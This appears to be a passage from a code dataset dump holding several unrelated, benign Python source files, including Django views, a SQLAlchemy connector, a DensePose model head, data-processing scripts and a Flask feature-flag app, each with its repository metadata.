list_to_dict(self, list_data):\n '''\n list 형태의 데이터를 dictionary 형태의 데이터로 변환\n :param list_data:\n :return: dictionary 형태의 데이터\n '''\n \n dict_data = dict((x, y) for x, y in list_data)\n\n return dict_data\n\n def dict_to_dataframe(self, dict_data, columns_name):\n '''\n dictionary 형태에서 dataframe 형태로 변환\n :param dict_data: dictionary 형태의 데이터\n :param columns_name: dataframe의 column 이름을 담은 list\n :return: dataframe 형태의 데이터\n '''\n \n dataframe_data = pd.DataFrame.from_dict(dict_data, orient='index', columns=columns_name)\n\n return dataframe_data\n\n def write_result_data(self, property_data, output_data):\n '''\n 확장자에 맞게 최종 데이터셋 저장\n :param property_data: 옵션을 선택하기 위한 property data\n :param output_data: 최종적으로 저장할 데이터\n :return: 없음\n '''\n\n outputFileName = property_data['output']\n try:\n ext = outputFileName.split('.')[1]\n except IndexError as e:\n print(\"'property' 파일의 'output'에 파일 확장자를 붙여서 적어주시기 바랍니다: {}\".format(e))\n\n dict_data = self.list_to_dict(output_data)\n columns = ['count']\n final_data = self.dict_to_dataframe(dict_data, columns)\n\n if (ext == \"csv\"): # result to csv\n try:\n final_data.to_csv(outputFileName, index=True, header=['count'], encoding='UTF-8-sig')\n except PermissionError as e:\n print(\"해당 CSV파일을 닫아주시기 바랍니다: {}\".format(e))\n elif (ext == \"txt\"): # result to txt\n with open(outputFileName, 'w', encoding='UTF-8') as file:\n for c in range(len(final_data)):\n file.writelines(str(final_data.index[c]) + ' ' + str(final_data['count'][c]) + \"\\n\")\n elif (ext == \"json\"): # result to json\n final_data.to_json(outputFileName, orient='table', encoding='UTF-8')\n else:\n print(\"Error: 해당되는 확장자만 적어주세요. 
(csv, txt, json)\")\n sys.exit()\n\n def run(self):\n '''\n main function of this program: 단어 개수 내림차순 출력하기\n :return: 없음\n '''\n\n now = time.localtime()\n print(\"시작 시간: %04d/%02d/%02d %02d:%02d:%02d\" % (now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec))\n\n start_time1 = time.time()\n property_data = self.get_yaml_property()\n end_time1 = time.time()\n total_time1 = end_time1 - start_time1\n print(\"self.get_yaml_property: {} sec\".format(total_time1))\n\n start_time2 = time.time()\n key_data_from_json = self.get_key_data_from_json_file(property_data[\"input\"], property_data[\"key\"])\n end_time2 = time.time()\n total_time2 = end_time2 - start_time2\n print(\"self.get_key_data_from_json_file: {} sec\".format(total_time2))\n\n start_time3 = time.time()\n split_data = self.split_data_by_blank(key_data_from_json)\n end_time3 = time.time()\n total_time3 = end_time3 - start_time3\n print(\"self.split_data_by_blank: {} sec\".format(total_time3))\n\n start_time4 = time.time()\n counted_data, num = self.get_count_by_word(split_data)\n end_time4 = time.time()\n total_time4 = end_time4 - start_time4\n print(\"self.get_count_by_word: {} sec\".format(total_time4))\n\n start_time5 = time.time()\n sorted_list = self.sort_collections_to_list(property_data, counted_data, num)\n end_time5 = time.time()\n total_time5 = end_time5 - start_time5\n print(\"self.sort_collections_to_list: {} sec\".format(total_time5))\n\n start_time6 = time.time()\n self.write_result_data(property_data, sorted_list)\n end_time6 = time.time()\n total_time6 = end_time6 - start_time6\n print(\"self.write_result_data: {} sec\".format(total_time6))\n\n print(\"[프로그램 종료]\")\n print(\"걸린 시간: {}\".format(total_time1 + total_time2 + total_time3 + total_time4 + total_time5 + total_time6))\n\n\n\n\n\nif __name__ == \"__main__\":\n jsonFileWordCountProgram = JsonFileWordCountProgram()\n jsonFileWordCountProgram.run()\n","sub_path":"problem3/jsonFileWordCountProgram.py","file_name":"jsonFileWordCountProgram.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"116931544","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/evogrid/common/evaluators.py\n# Compiled at: 2006-08-10 15:54:24\n\"\"\"Adapters for evaluator components\n\nAs Evaluator components are highly representation dependent, no default\nimplementation is provided.\n\nHowever, you will find here a default multi-adapter for the following scheme:\n(IEvaluator, IProvider) -> IProvider\n\"\"\"\nfrom zope.interface import implements\nfrom zope.component import provideAdapter, adapts\nfrom evogrid.caching.interfaces import ICache\nfrom evogrid.caching.ram import RAMCache\nfrom evogrid.interfaces import IEvaluator\nfrom evogrid.interfaces import IProvider\n\nclass BaseEvaluator(object):\n \"\"\"Abstract class to provide default implementation for ``evaluate``\"\"\"\n __module__ = __name__\n\n def compute_fitness(self, cs):\n raise NotImplementedError\n\n def evaluate(self, rep):\n rep.evaluation = self.compute_fitness(rep.candidate_solution)\n\n\nclass ProviderFromEvaluator(object):\n \"\"\"Default adapter to use evaluator with providers chains\n\n This uses a class that wraps a generator since generators are builtin python\n objects that do not support interface implementation.\n \"\"\"\n __module__ = __name__\n 
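# note (added): zope.interface declarations follow - this adapter class provides IProvider and adapts an (IEvaluator, IProvider) pair\n    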
implements(IProvider)\n adapts(IEvaluator, IProvider)\n\n def _buildGenerator(self, evaluator, provider):\n while True:\n replicator = provider.next()\n evaluator.evaluate(replicator)\n yield replicator\n\n def __init__(self, evaluator, provider):\n generator = self._buildGenerator(evaluator, provider)\n self._generator = generator\n\n def next(self):\n return self._generator.next()\n\n def __iter__(self):\n return self._generator\n\n\nprovideAdapter(ProviderFromEvaluator)\n_marker = object()\n\nclass MemoizedEvaluator(BaseEvaluator):\n \"\"\"Base implementation of a memoize wrapper\n\n The key used is built on the ``candidate_solution`` attribute of the\n replicator being evaluated.\n \"\"\"\n __module__ = __name__\n implements(IEvaluator)\n adapts(IEvaluator, ICache)\n\n def __init__(self, evaluator, cache=None):\n self._evaluator = evaluator\n if cache is None:\n cache = RAMCache(max_entries=100)\n self._cache = cache\n self._key_common = {'class': evaluator.__class__.__name__, 'method': 'evaluate'}\n return\n\n def compute_fitness(self, cs):\n key = self._key_common.copy()\n key['cs'] = cs\n result = self._cache.query(key, _marker)\n if result is _marker:\n result = self._evaluator.compute_fitness(cs)\n self._cache.set(key, result)\n return result\n else:\n return result","sub_path":"pycfiles/evogrid-0.1.0-py2.4/evaluators.py","file_name":"evaluators.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349447697","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.13-x86_64/egg/reviewboard/reviews/evolutions/reviewrequest_unique_together_baseline.py\n# Compiled at: 2020-02-11 04:03:56\nfrom __future__ import unicode_literals\nfrom django_evolution.mutations import ChangeMeta\nMUTATIONS = [\n ChangeMeta(b'ReviewRequest', b'unique_together', (\n ('commit_id', 'repository'),\n ('changenum', 'repository'),\n ('local_site', 'local_id')))]","sub_path":"pycfiles/ReviewBoard-3.0.17-py2.7/reviewrequest_unique_together_baseline.py","file_name":"reviewrequest_unique_together_baseline.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431847054","text":"from django.shortcuts import render, redirect\nfrom cmdb.models import AssetHosts\n\n# Create your views here.\n\n\ndef hosts(request):\n is_login = request.session.get('is_login', False)\n hosts_all = AssetHosts.objects.all()\n if is_login:\n return render(request, 'cmdb/hosts.html', {'hosts_data': hosts_all})\n else:\n return redirect('/login/')\n\n\ndef app(request):\n is_login = request.session.get('is_login', False)\n if is_login:\n return render(request, 'cmdb/app.html')\n else:\n return redirect('/login/')","sub_path":"cmdb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415025471","text":"\"\"\"\nProject Euler - Problem 3\n\"\"\"\n\n\ndef gen_primes():\n D = {}\n q = 2\n while True:\n if q not in D:\n yield q\n D[q * q] = [q]\n else:\n for p in D[q]:\n D.setdefault(p + q, []).append(p)\n del D[q]\n q += 1\n\n\ndef prime_factor(number):\n prime_factors = []\n while number != 1:\n for x in gen_primes():\n if number % x == 0:\n prime_factors.append(x)\n number /= x\n break\n return 
prime_factors\n\n\nif __name__ == '__main__':\n pf = prime_factor(600851475143)\n print(pf)\n","sub_path":"Problem_3/max_prime_factor.py","file_name":"max_prime_factor.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"370991835","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\n\nstrPath = '/Users/lishaojun/dev/pylisj/django/lte/static/data/'\n\n\nfileA = 'LTE样例数据.xlsx'\nfileB = 'taz_10_big.csv'\n\n\ndf = pd.read_excel(strPath+fileA)\n\ncols = ['子网', '子网名称', '网元', '网元名称','小区','小区名称' ]\nb = df.groupby(by=cols)['查询粒度'].count()\na = b.to_frame()\n\n#字段顺序为:子网ID,子网,网元ID,网元,小区\ndfc = pd.DataFrame({\"子网\":\"\", \"子网名称\":\"\",\"网元\":\"\",\"网元名称\":\"\",\"小区\":\"\",\"小区名称\":\"\"},index=[\"0\"])\ndfc = dfc.drop('0')\nfor index,row in a.iterrows():\n dfc = dfc.append(\n {\n \"子网\":index[0],\n \"子网名称\":index[1],\n \"网元\":index[2],\n \"网元名称\":index[3],\n \"小区\": index[4],\n \"小区名称\":index[5]\n },\n ignore_index=True)\n\ndfc.to_excel(strPath+'小区.xlsx',index=False, columns=cols)\n\n\nzw = df['子网'].unique()\nfor z in zw:\n fileB = str(z)+'.xlsx'\n dz = df[df['子网'] == z]\n dz.to_excel(strPath+'zw/'+fileB,index=False)","sub_path":"django/lte/scripts/anafile.py","file_name":"anafile.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600958855","text":"import re\n\ntext = open('abbrtemp.txt','r').read().split('\\n')\n\ndef ret_full_form(abbr):\n abbr = abbr.upper()\n for f in tect:\n if f.find(abbr)!=-1:\n return f[f.find('\\x97')+1:]\n\ndef find_word(question):\n #Correction Needed\n q = re.sub(r' ',\"\",question)\n if q.find('of')!=-1:\n return q[q.find('of')+2:q.find('?')]\n if q.find('does')!=-1:\n return q2[q2.find('does')+5:q2.find('stand')-1]\n\ndef answer_abbreviations(question):\n abbr = find_word(question)\n print('Abbreviation ',abbr)\n return ret_full_form(abbr)\n","sub_path":"abbreviations.py","file_name":"abbreviations.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"71390462","text":"from django.test import TestCase\n\nfrom test_generator.viewsets import TestModelViewsetMixin\n\nfrom rdmo.accounts.utils import set_group_permissions\n\nfrom ..models import Attribute\n\n\nclass DomainViewsetTestCase(TestCase):\n\n fixtures = (\n 'users.json',\n 'groups.json',\n 'accounts.json',\n 'domain.json',\n 'options.json',\n )\n\n users = (\n ('editor', 'editor'),\n ('reviewer', 'reviewer'),\n ('user', 'user'),\n ('api', 'api'),\n ('anonymous', None),\n )\n\n status_map = {\n 'list_viewset': {\n 'editor': 200, 'reviewer': 200, 'api': 200, 'user': 403, 'anonymous': 401\n },\n 'detail_viewset': {\n 'editor': 200, 'reviewer': 200, 'api': 200, 'user': 403, 'anonymous': 401\n },\n 'create_viewset': {\n 'editor': 201, 'reviewer': 403, 'api': 201, 'user': 403, 'anonymous': 401\n },\n 'update_viewset': {\n 'editor': 200, 'reviewer': 403, 'api': 200, 'user': 403, 'anonymous': 401\n },\n 'delete_viewset': {\n 'editor': 204, 'reviewer': 403, 'api': 204, 'user': 403, 'anonymous': 401\n }\n }\n\n @classmethod\n def setUpTestData(cls):\n set_group_permissions()\n\n\nclass AttributeTests(TestModelViewsetMixin, DomainViewsetTestCase):\n\n # get attributes and order them by level to delete the attributes at the bottom of the tree first\n instances = Attribute.objects.order_by('-level')\n url_names = {\n 'viewset': 
'v1-domain:attribute'\n }\n\n def _test_create_viewset(self, username):\n for instance in self.instances:\n instance.key += '_new'\n self.assert_create_viewset(username, data=self.get_instance_as_dict(instance))\n\n def _test_delete_viewset(self, username):\n for instance in self.instances:\n self.assert_delete_viewset(username, kwargs={\n 'pk': instance.pk\n })\n","sub_path":"rdmo/domain/tests/test_viewsets.py","file_name":"test_viewsets.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"435881469","text":"from collections import defaultdict\n\n\ndef traverse(graph, curr, result):\n descendants = 0\n\n for child in graph[curr]:\n num_nodes, result = traverse(graph, child, result)\n\n result[child] += num_nodes - 1\n descendants += num_nodes\n\n return descendants + 1, result\n\n\ndef max_edges(graph):\n start = list(graph)\n start = start[0]\n vertices = defaultdict(int)\n\n _, descendants = traverse(graph, start, vertices)\n\n return len([val for val in descendants.values() if val % 2 == 1])\n\n\ngraph = {\n 1: [2, 3],\n 2: [],\n 3: [4, 5],\n 4: [6, 7, 8],\n 5: [],\n 6: [],\n 7: [],\n 8: []\n}\n\nprint(max_edges(graph))\n","sub_path":"src/main/scala/KeepEvenNodeNumber.py","file_name":"KeepEvenNodeNumber.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"124403525","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport re\nfrom typing import Tuple\nfrom collections import defaultdict\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm.query import Query\n#from sqlalchemy.inspection import inspect\nfrom sqlalchemy import inspect\nfrom sqlalchemy.ext.hybrid import hybrid_property\n\nimport logging\n\nlogging.basicConfig(format='%(process)d-%(levelname)s-%(message)s')\n\nsys.path.append(os.path.join(os.path.dirname(__file__)))\n\n\nclass BaseSQLConnector:\n \"\"\"\n Base class for SQL connectors\n \"\"\" \n def __init__(self) -> None:\n self.var = None\n \n def _create_conn_str(self, configs: dict, db: str = \"pgsql\") -> str:\n \"\"\"\n Create configuration from a dictioney\n :params configs: Configuration data as dictionery\n :params db: Database type. 
Supported DB type.\n Supported values PostgreSQL -> pgsql\n :returns conn_str: Connection string\n \"\"\"\n pgsql_str = \"postgresql+psycopg2://{0}:{1}@{2}/{3}\"\n \n conn_str = None\n \n if db == \"pgsql\":\n conn_str = pgsql_str.format(configs.get('user_name'),\n configs.get('passwd'),\n configs.get('host'),\n configs.get('database'))\n \n return conn_str\n \n\n\nclass PgSQLConnector(BaseSQLConnector):\n \"\"\"\n PostgreSQL Connctor with context manager examples\n ADopted from \n https://medium.com/@ramojol/python-context-managers-and-the-with-statement-8f53d4d9f87\n \"\"\"\n \n \n def __init__(self,config_data: dict) -> None:\n super().__init__()\n self.conn_str = self._create_conn_str(config_data,\n db='pgsql')\n self.db_session = None\n self.engine = None\n\n \n def __enter__(self):\n db_engine = create_engine(self.conn_str)\n self.engine = db_engine\n DBSession = sessionmaker()\n\n self.db_session = DBSession(bind=db_engine)\n return self\n\n def __exit__(self,exec_type,exec_val,exec_tb):\n self.db_session.close()\n\n\n\n# class MySQLConnector(BaseSQLConnector):\n# raise NotImplementedError\n\n# class MariaDBConnector(BaseSQLConnector):\n# raise NotImplementedError\n\n# class HiveConnector(BaseSQLConnector):\n# raise NotImplementedError\n\n# class ImpalaConnector(BaseSQLConnector):\n# raise NotImplementedError\n\n\ndef alch_query_to_dict(query_res: Query) -> dict:\n \"\"\"\n Convert SQL Alcheny resuts to a Python dictionary\n This is excellent for using with pandas DataFrame\n :params query_res: Query result object\n :returns documents: data as Dictionary\n \n Reference - https://gist.github.com/garaud/bda10fa55df5723e27da\n \"\"\"\n documents = defaultdict(list)\n \n for qobj in query_res:\n res_instance = inspect(qobj)\n for key,value in res_instance.attrs.items():\n documents[key].append(value.value)\n \n return documents\n \n\ndef parse_integrity_err(err_msg: str) -> Tuple[str,str]:\n \"\"\"\n Parse the integrity error from the SQLAlchemy\n IntegrityError message_detail. 
The message_detail\n contains information such as ['column_name', 'constraint_name',\n 'context', 'datatype_name', 'internal_position', \n 'internal_query', 'message_detail', 'message_hint', \n 'message_primary', 'schema_name', 'severity', \n 'source_file', 'source_function', 'source_line', \n 'sqlstate', 'statement_position', 'table_name']\n #REFERENCE - https://stackoverflow.com/questions/21540702/\n \n The message_detail contains information about \n Which column caused the primary key error and the\n First value SQLAlchemy tried to insert,\n :param err_msg: Error message (message_detail)\n :returns pk_column: Primary key column name\n :returns pk_val: Primary key valu e (first one)\n \"\"\"\n\n message_regex = r\"(\\(.*\\))=(\\(.*\\))\"\n\n pk_column = None\n pk_val = None\n\n pk_column_val_details = re.findall(message_regex,\n err_msg,\n re.MULTILINE)\n\n try:\n pk_column = pk_column_val_details[0][0]\n pk_column = pk_column.replace(\"(\",'')\n pk_column = pk_column.replace(\")\",'')\n pk_val = pk_column_val_details[0][1]\n pk_val = pk_val.replace(\"(\",'')\n pk_val = pk_val.replace(\")\",'')\n except Exception as err:\n logging.info(\"Error in processing the message {0}\".format(err))\n\n\n return (pk_column, pk_val)\n\nif __name__ == \"__main__\":\n connection_conf = {'user_name':'sweng',\n 'passwd':'*****',\n 'host':'myhost',\n 'database':'mydb'}\n\n with PgSQLConnector(connection_conf) as db:\n print(db.db_session)","sub_path":"course/utils/dbutils.py","file_name":"dbutils.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594337321","text":"import numpy as np\nfrom typing import Dict, List, Optional, Any\n\nimport torch, pdb, os, pickle\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport torch.utils.checkpoint as checkpoint\n\nfrom fvcore.nn import sigmoid_focal_loss_jit\nimport fvcore.nn.weight_init as weight_init\n\n# from adet.layers import conv_with_kaiming_uniform\n# from adet.utils.comm import aligned_bilinear\nfrom detectron2.layers import Conv2d, ShapeSpec, get_norm, ConvTranspose2d\nfrom detectron2.modeling import ROI_HEADS_REGISTRY, StandardROIHeads\nfrom detectron2.modeling.poolers import ROIPooler\nfrom detectron2.modeling.roi_heads import select_foreground_proposals\nfrom detectron2.structures import ImageList, Instances, Boxes\n\nfrom densepose.layers import conv_with_kaiming_uniform, deform_conv\nfrom densepose.utils.comm import compute_locations, compute_grid, aligned_bilinear\nfrom ..roi_heads import DensePoseDeepLabHead\nfrom .. import (\n build_densepose_data_filter,\n build_densepose_head,\n build_densepose_losses,\n build_densepose_predictor,\n densepose_inference,\n)\nfrom lambda_networks import LambdaLayer\nfrom .iuv_head import get_embedder\nfrom ..utils import initialize_module_params\nimport pdb\n\nINF = 100000000\n\ndef build_iuv_pooler2_head(cfg, input_shape):\n # return GlobalIUVHead(cfg)\n return CoordGlobalIUVPooler2Head(cfg, input_shape=input_shape)\n\n\nclass Decoder(nn.Module):\n \"\"\"\n A semantic segmentation head described in detail in the Panoptic Feature Pyramid Networks paper\n (https://arxiv.org/abs/1901.02446). 
It takes FPN features as input and merges information from\n all levels of the FPN into single output.\n \"\"\"\n\n def __init__(self, cfg, input_shape: Dict[str, ShapeSpec], in_features: torch.Tensor, pe_dim=0):\n super(Decoder, self).__init__()\n\n # fmt: off\n self.in_features = in_features\n feature_strides = {k: v.stride for k, v in input_shape.items()}\n feature_channels = {k: v.channels for k, v in input_shape.items()}\n # num_classes = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECODER_NUM_CLASSES\n num_classes = 75\n conv_dims = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECODER_CONV_DIMS\n self.common_stride = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECODER_COMMON_STRIDE\n norm = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECODER_NORM\n num_lambda_layer = cfg.MODEL.CONDINST.IUVHead.NUM_LAMBDA_LAYER\n lambda_layer_r = cfg.MODEL.CONDINST.IUVHead.LAMBDA_LAYER_R\n self.use_ins_gn = cfg.MODEL.CONDINST.IUVHead.INSTANCE_AWARE_GN\n # fmt: on\n\n self.scale_heads = []\n for in_feature in self.in_features:\n head_ops = []\n head_length = max(\n 1, int(np.log2(feature_strides[in_feature]) - np.log2(self.common_stride))\n )\n for k in range(head_length):\n conv = Conv2d(\n feature_channels[in_feature] if k == 0 else conv_dims,\n conv_dims,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=not norm,\n norm=get_norm(norm, conv_dims),\n activation=F.relu,\n )\n weight_init.c2_msra_fill(conv)\n head_ops.append(conv)\n if feature_strides[in_feature] != self.common_stride:\n head_ops.append(\n nn.Upsample(scale_factor=2, mode=\"bilinear\", align_corners=False)\n )\n self.scale_heads.append(nn.Sequential(*head_ops))\n self.add_module(in_feature, self.scale_heads[-1])\n\n # self.predictor = Conv2d(conv_dims, num_classes, kernel_size=1, stride=1, padding=0)\n \n\n if num_lambda_layer>0:\n self.comb_pe_conv = LambdaLayer(\n dim = conv_dims+pe_dim,\n dim_out = conv_dims,\n r = lambda_layer_r, # the receptive field for relative positional encoding (23 x 23)\n dim_k = 16,\n heads = 4,\n dim_u = 4\n )\n else:\n self.comb_pe_conv = Conv2d(\n conv_dims+pe_dim,\n conv_dims,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=not norm,\n norm=get_norm(norm, conv_dims),\n activation=F.relu,\n )\n # weight_init.c2_msra_fill(self.comb_pe_conv)\n\n self.densepose_head = build_densepose_head(cfg, conv_dims)\n\n self.predictor = Conv2d(\n cfg.MODEL.ROI_DENSEPOSE_HEAD.CONV_HEAD_DIM, num_classes, 1, stride=1, padding=0\n )\n initialize_module_params(self.predictor)\n # weight_init.c2_msra_fill(self.predictor)\n\n def forward(self, features: List[torch.Tensor], iuv_feats: torch.Tensor, rel_coord: Any, abs_coord: Any, fg_mask: Any, ins_mask_list=None):\n for i, _ in enumerate(self.in_features):\n if i == 0:\n x = self.scale_heads[i](features[i])\n else:\n x = x + self.scale_heads[i](features[i])\n if rel_coord is not None:\n x = torch.cat([x,rel_coord], dim=1)\n if abs_coord is not None:\n x = torch.cat([x,abs_coord], dim=1)\n # if skeleton_feats is not None:\n # x = torch.cat([x,skeleton_feats], dim=1)\n\n # pdb.set_trace()\n if rel_coord is not None or abs_coord is not None:\n x = self.comb_pe_conv(x)\n x = x * fg_mask\n\n\n if self.use_ins_gn:\n ## dense to sparse\n N, C, H, W = x.shape\n coord = compute_grid(H, W, device=x.device, norm=False)\n # sparse_coord_batch = []\n # sparse_feat_batch = []\n ins_indices_batch = []\n # ins_indices_len = []\n # ins_cnt = 0\n for n in range(N):\n # m = fg_mask[n:n+1]\n x_indices = coord[0]\n y_indices = coord[1]\n # pdb.set_trace()\n # bg_and_ins = torch.cat([m[0],ins_mask_list[n].float()], dim=0)\n # ins_indices = 
torch.argmax(bg_and_ins, dim=0)[m[0,0]>0] + ins_cnt\n # try:\n # pdb.set_trace()\n logit_bg_fg = torch.cat([(1-fg_mask[n])*99999., ins_mask_list[n].float()], dim=0)\n ins_indices = torch.argmax(logit_bg_fg, dim=0) - 1 ## set bg to -1\n ins_indices[ins_indices>=0] = ins_indices[ins_indices>=0] #+ ins_cnt\n ins_indices_batch.append(ins_indices)\n # ins_cnt += ins_mask_list[n].shape[0] - 1 ## exclude bg class\n\n ins_indices_batch = torch.stack(ins_indices_batch,dim=0)\n\n x = self.densepose_head(x, ins_indices_batch)\n else:\n x = self.densepose_head(x)\n x = self.predictor(x)\n\n return x\n\n\nclass CoordGlobalIUVPooler2Head(nn.Module):\n def __init__(self, cfg, input_shape=None):\n super().__init__()\n\n self._init_densepose_head(cfg, input_shape)\n\n def _init_densepose_head(self, cfg, input_shape):\n self.in_features = cfg.MODEL.ROI_HEADS.IN_FEATURES\n self.use_rel_coords = cfg.MODEL.CONDINST.IUVHead.REL_COORDS\n self.use_abs_coords = cfg.MODEL.CONDINST.IUVHead.ABS_COORDS\n self.pos_emb_num_freqs = cfg.MODEL.CONDINST.IUVHead.POSE_EMBEDDING_NUM_FREQS\n self.use_gt_ins = cfg.MODEL.CONDINST.IUVHead.GT_INSTANCES\n self.inference_global_siuv = cfg.MODEL.CONDINST.INFERENCE_GLOBAL_SIUV\n self.add_skeleton_feat = cfg.MODEL.CONDINST.IUVHead.SKELETON_FEATURES\n self.use_pos_emb = self.pos_emb_num_freqs>0\n if self.use_pos_emb:\n self.position_embedder, self.position_emb_dim = get_embedder(multires=self.pos_emb_num_freqs, input_dims=2)\n self.pe_dim_all = 0\n if self.use_rel_coords:\n self.pe_dim_all += self.position_emb_dim\n if self.use_abs_coords:\n self.pe_dim_all += self.position_emb_dim\n if self.add_skeleton_feat:\n self.pe_dim_all += 55\n self.decoder = Decoder(cfg, input_shape, self.in_features, self.pe_dim_all)\n\n dp_pooler_resolution = cfg.MODEL.ROI_DENSEPOSE_HEAD.HEATMAP_SIZE\n dp_pooler_sampling_ratio = 0\n dp_pooler_type = cfg.MODEL.ROI_DENSEPOSE_HEAD.POOLER_TYPE\n dp_pooler_scales = (1.0 / input_shape[self.in_features[0]].stride,)\n # in_channels = [input_shape[f].channels for f in self.in_features][0]\n self.densepose_pooler = ROIPooler(\n output_size=dp_pooler_resolution,\n scales=dp_pooler_scales,\n sampling_ratio=dp_pooler_sampling_ratio,\n pooler_type=dp_pooler_type,\n )\n # self.densepose_head = build_densepose_head(cfg, in_channels)\n # self.densepose_predictor = build_densepose_predictor(\n # cfg, self.densepose_head.n_out_channels\n # )\n self.densepose_losses = build_densepose_losses(cfg)\n\n def forward(self, fpn_features, s_logits, iuv_feats, iuv_feat_stride, rel_coord, instances, fg_mask, gt_instances=None, ins_mask_list=None):\n # assert not self.use_abs_coords\n\n fea0 = fpn_features[self.in_features[0]]\n N, _, H, W = fea0.shape\n\n if self.use_rel_coords: \n if self.use_pos_emb:\n rel_coord = self.position_embedder(rel_coord)\n else:\n rel_coord = None\n\n if self.use_abs_coords: \n abs_coord = compute_grid(H, W, device=fea0.device)[None,...].repeat(N,1,1,1)\n if self.use_pos_emb:\n abs_coord = self.position_embedder(abs_coord)\n else:\n abs_coord = None\n\n features = [fpn_features[f] for f in self.in_features]\n\n if self.inference_global_siuv:\n assert not self.training\n\n if self.training:\n features = [self.decoder(features, iuv_feats, rel_coord, abs_coord, fg_mask, ins_mask_list)]\n features_dp_ori = features[0]\n proposal_boxes = [x.gt_boxes for x in gt_instances]\n features_dp = self.densepose_pooler(features, proposal_boxes)\n iuv_logits = features_dp\n # iuv_logit_global = features[0]\n return None, iuv_logits, features_dp_ori\n else:\n features = 
[self.decoder(features, iuv_feats, rel_coord, abs_coord, fg_mask, ins_mask_list)]\n # pdb.set_trace()\n features_dp_ori = features[0]\n\n if self.inference_global_siuv:\n iuv_logits = features[0]\n coarse_segm = s_logits\n else:\n # if isinstance(instances,Instances):\n # if self.use_gt_ins:\n # proposal_boxes = [x.gt_boxes for x in gt_instances]\n # else:\n proposal_boxes = [instances.pred_boxes]\n # else:\n # proposal_boxes = [x.pred_boxes for x in instances]\n features_dp = self.densepose_pooler(features, proposal_boxes)\n # pdb.set_trace()\n s_logit_list = []\n for idx in range(s_logits.shape[0]):\n s_logit = self.densepose_pooler([s_logits[idx:idx+1]], [proposal_boxes[0][idx:idx+1]])\n s_logit_list.append(s_logit)\n coarse_segm = torch.cat(s_logit_list,dim=0)\n # iuv_logit = torch.cat([torch.cat(s_logit_list,dim=0), features_dp], dim=1)\n # iuv_logit_global = features[0]\n iuv_logits = features_dp\n # print(instances.pred_boxes)\n # else:\n # features = [self.decoder(features, iuv_feats, rel_coord, abs_coord, fg_mask, ins_mask_list)]\n # proposal_boxes = [instances.pred_boxes]\n # features_dp = self.densepose_pooler(features, proposal_boxes)\n # iuv_logit = features_dp\n # iuv_logit_global = features[0]\n\n\n return coarse_segm, iuv_logits, features_dp_ori\n\n\n\n\n\n\n","sub_path":"projects/DensePose/densepose/modeling/condinst/iuv_pooler2_head.py","file_name":"iuv_pooler2_head.py","file_ext":"py","file_size_in_byte":12071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"266922130","text":"import json\nimport logging\n\nimport ldclient\nfrom flask import (Blueprint, current_app, flash, redirect, render_template,\n request, url_for)\nfrom flask_login import current_user, login_required, login_user, logout_user\nfrom werkzeug.urls import url_parse\n\nfrom app.factory import CACHE_TIMEOUT, CachingDisabled, cache, db\nfrom app.models import User, Plan\n\ncore = Blueprint('core', __name__)\n\n@core.route('/')\n@core.route('/index')\n@login_required\ndef index():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n beta_features = ldclient.get().variation('dark-theme', current_user.get_ld_user(), False)\n \n set_theme = '{0}/index.html'.format(current_user.set_path)\n\n return render_template(set_theme, title='Home', show_beta=beta_features)\n\ndef updateTheme(theme):\n\n if theme == \"dark\":\n current_user.set_path = 'beta'\n else:\n current_user.set_path = 'default'\n\n db.session.commit()\n\n@core.route('/dark')\ndef darkTheme():\n return render_template(set_theme, title='Dark Theme')\n\n@core.route('/experiments')\ndef experiments():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n set_theme = '{0}/exp.html'.format(current_user.set_path)\n\n random_user = current_user.get_random_ld_user()\n\n show_nps = ldclient.get().variation('show-nps-survery', random_user, False)\n \n return render_template(set_theme, title='Experiments', show_nps=show_nps, random_user=random_user)\n\n@core.route('/operational')\ndef operational():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n set_theme = 